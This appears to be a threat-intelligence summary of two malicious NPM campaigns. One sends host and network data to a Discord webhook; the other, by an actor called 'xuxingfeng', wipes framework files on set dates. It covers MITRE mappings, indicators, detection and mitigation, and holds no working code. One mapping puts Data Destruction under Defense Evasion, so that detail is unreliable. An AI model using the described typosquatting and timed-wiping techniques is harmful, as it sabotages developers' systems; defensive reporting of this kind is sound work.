Full Report
60 packages have been discovered in the NPM index that attempt to collect sensitive host and network data and send it to a Discord webhook controlled by the threat actor. [...]
Analysis Summary
# Tool/Technique: Malicious NPM Packages (Data Collection & Data Wiping Payloads)
## Overview
This entry summarizes findings related to two distinct campaigns involving malicious packages published on the Node Package Manager (NPM) registry. One set of packages was designed for host and network data exfiltration, while the other utilized destructive payloads, including file deletion capabilities, targeting specific JavaScript ecosystems.
## Technical Details
- Type: Malware (Specifically, malicious software distributed via software supply chain compromise)
- Platform: Target environments running Node.js, JavaScript frameworks (React, Vue.js, Vite), and end-user systems leveraging these packages.
- Capabilities:
1. **Data Collection:** Collecting host and network information.
2. **Data Destruction/Wiping:** Deleting files, corrupting data, and sabotaging browser storage mechanisms.
- First Seen: Not explicitly stated, but one campaign's packages existed for the past two years.
## MITRE ATT&CK Mapping
The activity described maps primarily to Supply Chain Compromise and Execution tactics:
- **TA0001 - Initial Access**
- **T1195 - Supply Chain Compromise**
- T1195.002 - Compromise Software Supply Chain: Compromising a repository like NPM to inject malicious code.
- **TA0002 - Execution**
- **T1059 - Command and Scripting Interpreter** (If the packages execute arbitrary code upon installation/use)
- **TA0010 - Exfiltration** (For the data collection packages)
- **T1041 - Exfiltration Over C2 Channel**
- **TA0005 - Defense Evasion**
- **T1485 - Data Destruction** (For the wiping packages)
## Functionality
### Core Capabilities
**Data Collection Campaign:**
* Collects host details.
* Collects network data.
* Packages often used typosquatting or similar names to legitimate packages (e.g., 'flipper-plugins,' 'react-xterm2,' 'hermes-inspector-msggen').
**Data Wiping Campaign (Actor 'xuxingfeng'):**
* Targets React, Vue.js, Vite, Node.js, and Quill ecosystems.
* Payloads were time-delayed, activating based on hardcoded system dates (e.g., script designed to delete Vue.js-related files on June 19–30, 2023).
* Progressively destroys framework files.
* Corrupts core JavaScript methods.
* Sabotages browser storage mechanisms.
### Advanced Features
* **Social Engineering/Trust Building:** Using names similar to legitimate packages to trick developers (typosquatting or generic names).
* **Time-Delayed Execution:** The destructive payloads were designed to evade long-term detection by only activating on specific dates, suggesting pre-meditated, timed sabotage.
## Indicators of Compromise
* File Hashes: [Not provided in the context]
* File Names: Malicious packages observed on NPM (specific names varied, including 'flipper-plugins,' 'react-xterm2,' 'hermes-inspector-msggen,' and eight packages associated with the actor 'xuxingfeng').
* Registry Keys: [Not applicable/provided]
* Network Indicators: [Not detailed, as the focus is on the package distribution mechanism, but data collection implies outbound C2 communication.]
* Behavioral Indicators: Arbitrary code execution upon package installation/usage within a Node.js project; file system modifications (deletion/corruption) triggered by system date checks.
## Associated Threat Actors
* The threat actor behind the destructive campaign is identified by the NPM publishing name: **'xuxingfeng'**.
* The actor behind the data collection campaign is unnamed in the summary.
## Detection Methods
* Signature-based detection: Checking dependencies against known malicious package manifests or names.
* Behavioral detection: Monitoring installation scripts (`postinstall`) or initial execution routines of new NPM dependencies for suspicious file system access or network connections.
* YARA rules: [Not provided in the context]
## Mitigation Strategies
* Immediately remove any installed packages identified as malicious from project dependencies.
* Perform a full system scan upon discovering their installation to eradicate remnants.
* Implement strict dependency checking and approval workflows for packages, especially those with high download counts or unknown authors.
* Monitor source code integrity post-build/post-install for anomalous file access.
## Related Tools/Techniques
* Software Supply Chain Compromise (General technique).
* Typosquatting attacks targeting popular public repositories (e.g., PyPI, RubyGems, NPM).
* Other destructive malware utilizing time-based triggers.